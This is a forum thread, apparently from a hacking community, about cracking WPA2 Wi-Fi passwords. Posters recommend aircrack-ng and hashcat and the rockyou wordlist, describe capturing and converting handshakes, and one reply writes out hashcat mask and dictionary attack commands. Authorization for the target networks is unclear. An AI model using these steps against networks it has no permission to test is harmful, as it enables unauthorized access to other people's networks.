aka Posted June 29, 2018 Share Posted June 29, 2018 Hello, We know all the technics to hack wpa2 wifi password. - brute force using dictionary -wps -social engineering But could someone with good experiences on that can cite 3 best softwares that are currently works. Thanks Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted June 29, 2018 Share Posted June 29, 2018 (edited) Loads of experience here. Personally, aircrack-ng and oclHashCat are the way to go. No need for 3. Those 2 do it better than anything else I've come across. Aircrack for grabbing the handshake, HashCat for cracking it using GPU (fastest method I've come across). Edited June 29, 2018 by haze1434 Quote Link to comment Share on other sites More sharing options...
aka Posted July 1, 2018 Author Share Posted July 1, 2018 Thanks, I will try. But if I understand your point, once I got a handshake(with little laptop) then I will to my desktop(more power) and use oclhashcat to decrypt.. Correct. Sorry ,if i'm little tired to try everything to crack wpa2. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 1, 2018 Share Posted July 1, 2018 14 hours ago, aka said: Thanks, I will try. But if I understand your point, once I got a handshake(with little laptop) then I will to my desktop(more power) and use oclhashcat to decrypt.. Correct. Sorry ,if i'm little tired to try everything to crack wpa2. correct. Get a good password list like rockyou.txt and depending on the gpu for your desktop depends on how long it will take to run through the list. I have a GTX1050 and it runs through the rockyou.txt in about 3 mins. ive also cleaned the handshake to make it as small as possible to run quicker. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 2, 2018 Share Posted July 2, 2018 4 hours ago, b0N3z said: correct. Get a good password list like rockyou.txt and depending on the gpu for your desktop depends on how long it will take to run through the list. I have a GTX1050 and it runs through the rockyou.txt in about 3 mins. ive also cleaned the handshake to make it as small as possible to run quicker. I wonder how fast my 1080 Ti could do it... 20 seconds, maybe? Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 2, 2018 Share Posted July 2, 2018 23 hours ago, Dave-ee Jones said: I wonder how fast my 1080 Ti could do it... 20 seconds, maybe? maybe, also using kali for OS on a cheap ssd. So with a good ssd and 1080Ti would be quite quick Quote Link to comment Share on other sites More sharing options...
aka Posted July 3, 2018 Author Share Posted July 3, 2018 On 7/2/2018 at 1:39 AM, b0N3z said: correct. Get a good password list like rockyou.txt and depending on the gpu for your desktop depends on how long it will take to run through the list. I have a GTX1050 and it runs through the rockyou.txt in about 3 mins. ive also cleaned the handshake to make it as small as possible to run quicker. ok, i will try and let you know. i will install oclhascat on my both system windows and kali. but you said we used rockyou.txt wordlist to decrypt so i assume that wordlist is very efficient to decrypt wpa2. thanks Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 3, 2018 Share Posted July 3, 2018 4 minutes ago, aka said: ok, i will try and let you know. i will install oclhascat on my both system windows and kali. but you said we used rockyou.txt wordlist to decrypt so i assume that wordlist is very efficient to decrypt wpa2. thanks Havent tryed the windows subsystem for hashcat yet, just kali itself so I dont quite know how that will work. Yes the rockyou.txt is pretty good if you dont want to make a custom list. I have pulled a couple of my family members wifi passwords with the rockyou list, mainly to show them how bad there passwords are lol. they had no idea that somebody could even do something like that Quote Link to comment Share on other sites More sharing options...
aka Posted July 3, 2018 Author Share Posted July 3, 2018 31 minutes ago, b0N3z said: Havent tryed the windows subsystem for hashcat yet, just kali itself so I dont quite know how that will work. Yes the rockyou.txt is pretty good if you dont want to make a custom list. I have pulled a couple of my family members wifi passwords with the rockyou list, mainly to show them how bad there passwords are lol. they had no idea that somebody could even do something like that thanks, i will try and let you know. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 3, 2018 Share Posted July 3, 2018 23 hours ago, b0N3z said: maybe, also using kali for OS on a cheap ssd. So with a good ssd and 1080Ti would be quite quick Yeah I've got one of the Samsung 860 EVOs. Considering an M.2 but can't justify spending another $500 or so just for extra read/write speed.. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 3, 2018 Share Posted July 3, 2018 (edited) 9 minutes ago, Dave-ee Jones said: Yeah I've got one of the Samsung 860 EVOs. Considering an M.2 but can't justify spending another $500 or so just for extra read/write speed.. im running an old i7-2600K with 16gb ram and an intel 240gb with slower read/write (480 maybe). Working on upgrading mobo, cpu, ram, and power soon Edited July 3, 2018 by b0N3z Quote Link to comment Share on other sites More sharing options...
Exmix Posted July 4, 2018 Share Posted July 4, 2018 On 7/1/2018 at 4:09 PM, b0N3z said: correct. Get a good password list like rockyou.txt and depending on the gpu for your desktop depends on how long it will take to run through the list. I have a GTX1050 and it runs through the rockyou.txt in about 3 mins. ive also cleaned the handshake to make it as small as possible to run quicker. I have a question about that. As i've use aircrack mostly but as we all know it takes FOREVER. I was working with hashcat for a bit. It was hit and miss, like I used a dictionary that I know for 100% sure had the password of the handshake in it. Sometimes it would show it, sometimes it wouldn't. Is there any reason behind that? Also, how do you 'clean' the handshake? What exactly does that do? I'm not COMPLETELY into WiFi hacking, but would like know some basics of it. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 4, 2018 Share Posted July 4, 2018 4 hours ago, Exmix said: I have a question about that. As i've use aircrack mostly but as we all know it takes FOREVER. I was working with hashcat for a bit. It was hit and miss, like I used a dictionary that I know for 100% sure had the password of the handshake in it. Sometimes it would show it, sometimes it wouldn't. Is there any reason behind that? Also, how do you 'clean' the handshake? What exactly does that do? I'm not COMPLETELY into WiFi hacking, but would like know some basics of it. i loaded the pcap into wireshark and exported the handshake only, then convert the file to hashcat format with an online converter tool. I cant remember the website as I spent an entire day messing with it and havent really touched it since. Running the pcap with aircrack was taking 3-4hrs and once I setup kali and hashcat I was running handshakes in 2-3 mins Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted July 4, 2018 Share Posted July 4, 2018 2 hours ago, b0N3z said: I cant remember the website as I spent an entire day messing with it and havent really touched it since. https://hashcat.net/cap2hccapx/ 1 Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 4, 2018 Share Posted July 4, 2018 (edited) 2 minutes ago, haze1434 said: https://hashcat.net/cap2hccapx/ yes sir Edited July 4, 2018 by b0N3z 1 Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted July 4, 2018 Share Posted July 4, 2018 2 hours ago, b0N3z said: i loaded the pcap into wireshark and exported the handshake only Could you explain the steps to do this at all? To be honest, I've not really bothered with this in the past. Does it make much of a difference in time to crack? Thank you. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 4, 2018 Share Posted July 4, 2018 1 minute ago, haze1434 said: Could you explain the steps to do this at all? To be honest, I've not really bothered with this in the past. Does it make much of a difference in time to crack? Thank you. The only reason I exported the individual handshake was because I had multiple handshakes in the same pcap and I wanted to separate each one to its on individual pcap file. I dont know the exact filter I used in wireshark but you can google wireshark filter for wifi handshake and give it a try. You only need the first 3 packets of the handshake to crack. this will make the file smaller and I dont really know if it makes much of a difference unless your pcap is huge, as in it took forever to get the handshake and the file is very large. Sry I cant be more specific, I quit messing with it after I figured it out and for some reason didnt make any notes on the subject. probably because beer lol 1 Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted July 4, 2018 Share Posted July 4, 2018 10 minutes ago, b0N3z said: probably because beer lol Ha no worries. I'll have to have another play this weekend Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 4, 2018 Share Posted July 4, 2018 my biggest hurdle was figuring out hashcat and converting the pcap to hccapx. once I had that figured out, it was smooth sailing from there. Im also going to have to dig into it a bit more and make notes this time lol Quote Link to comment Share on other sites More sharing options...
aka Posted July 5, 2018 Author Share Posted July 5, 2018 On 7/4/2018 at 8:01 PM, b0N3z said: my biggest hurdle was figuring out hashcat and converting the pcap to hccapx. once I had that figured out, it was smooth sailing from there. Im also going to have to dig into it a bit more and make notes this time lol HI, sorry to disturb you, since you have more experience on using hashcat. can you give at aleast an average config to decrypt wpa. i'm little confused with interface, wordlist, hybrid, bruteforce etc... i used hascat v4.1.0, and gui v1.00rc3 Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted July 6, 2018 Share Posted July 6, 2018 (edited) 13 hours ago, aka said: HI, sorry to disturb you, since you have more experience on using hashcat. can you give at aleast an average config to decrypt wpa. i'm little confused with interface, wordlist, hybrid, bruteforce etc... i used hascat v4.1.0, and gui v1.00rc3 Most of the time, you'll want to go for a Mask Attack. Using Windows CMD, this would be something like; oclHashCat.exe -m 2500 HASHES.txt -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 (run Hashcat) (hash type is WPA/WPA2) (use HASHES.txt for the hashes to be cracked) (mode Brute-Force) (create '1' as meaning lowercase, uppercase and numbers) (set password as 8 characters in length, so 1 repeated 8 times) The above will (I think, I'd need to double check the syntax) crack a WPA2 password that is up to 8 characters in length and contains uppercase, lowercase and numbers. You should research the default passwords for the router being pentested; the above mask should be amended to match initially. For example, if you knew the password was 5 letters and 4 numbers, you could use; -1 ?l?u -2 ?d ?1?1?1?1?1?2?2?2?2 Note the above is a brute-force example, you should exhaust your password files first, such as rockyou, via a dictionary attack; oclHashCat.exe –m 2500 HASHES.txt DICTIONARY.txt I go in this order; Dictionary attacks, using the smallest/quickest dictionary first and the slowest last Mask attack using likely default password layout Mask attack using incremental lowercase letters, uppercase letters and numbers, up to 12 digits Anything past this usually takes too long, so if the above fails, I tend to stop there and admit defeat. You can judge this based on your rig. Edited July 6, 2018 by haze1434 1 Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 6, 2018 Share Posted July 6, 2018 (edited) 3 hours ago, haze1434 said: Most of the time, you'll want to go for a Mask Attack. Using Windows CMD, this would be something like; oclHashCat.exe -m 2500 HASHES.txt -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 (run Hashcat) (hash type is WPA/WPA2) (use HASHES.txt for the hashes to be cracked) (mode Brute-Force) (create '1' as meaning lowercase, uppercase and numbers) (set password as 8 characters in length, so 1 repeated 8 times) The above will (I think, I'd need to double check the syntax) crack a WPA2 password that is up to 8 characters in length and contains uppercase, lowercase and numbers. You should research the default passwords for the router being pentested; the above mask should be amended to match initially. For example, if you knew the password was 5 letters and 4 numbers, you could use; -1 ?l?u -2 ?d ?1?1?1?1?1?2?2?2?2 Note the above is a brute-force example, you should exhaust your password files first, such as rockyou, via a dictionary attack; oclHashCat.exe –m 2500 HASHES.txt DICTIONARY.txt I go in this order; Dictionary attacks, using the smallest/quickest dictionary first and the slowest last Mask attack using likely default password layout Mask attack using incremental lowercase letters, uppercase letters and numbers, up to 12 digits Anything past this usually takes too long, so if the above fails, I tend to stop there and admit defeat. You can judge this based on your rig. you went further than I. I normally just run a wordlist and call it a day. If I get it cool, if not I move on. Edited July 6, 2018 by b0N3z 1 Quote Link to comment Share on other sites More sharing options...
aka Posted July 6, 2018 Author Share Posted July 6, 2018 THANKS. i try your combination, but i think my graphic card is not too powerful for mask-attack, so i try again by using a word-list that i modified and it's works. so my conclusion is : 1- if you have a good graphic card mast-attack is better and avoid you to think to hard to custom a word list. 2- with a good recon and luck, word list gives you a good crack but you have to repeat the test 3. my interface of hashcat Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 6, 2018 Share Posted July 6, 2018 I run a GTX 1050 and it worked great. It is a budget card I got for around $100-125 ish. Quote Link to comment Share on other sites More sharing options...
aka Posted July 6, 2018 Author Share Posted July 6, 2018 (edited) 1 hour ago, b0N3z said: I run a GTX 1050 and it worked great. It is a budget card I got for around $100-125 ish. for mask-attack ?? i have to change my graphic card , i have gtx 660 2gb, so i plan to get 1050 gtx Edited July 6, 2018 by aka Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.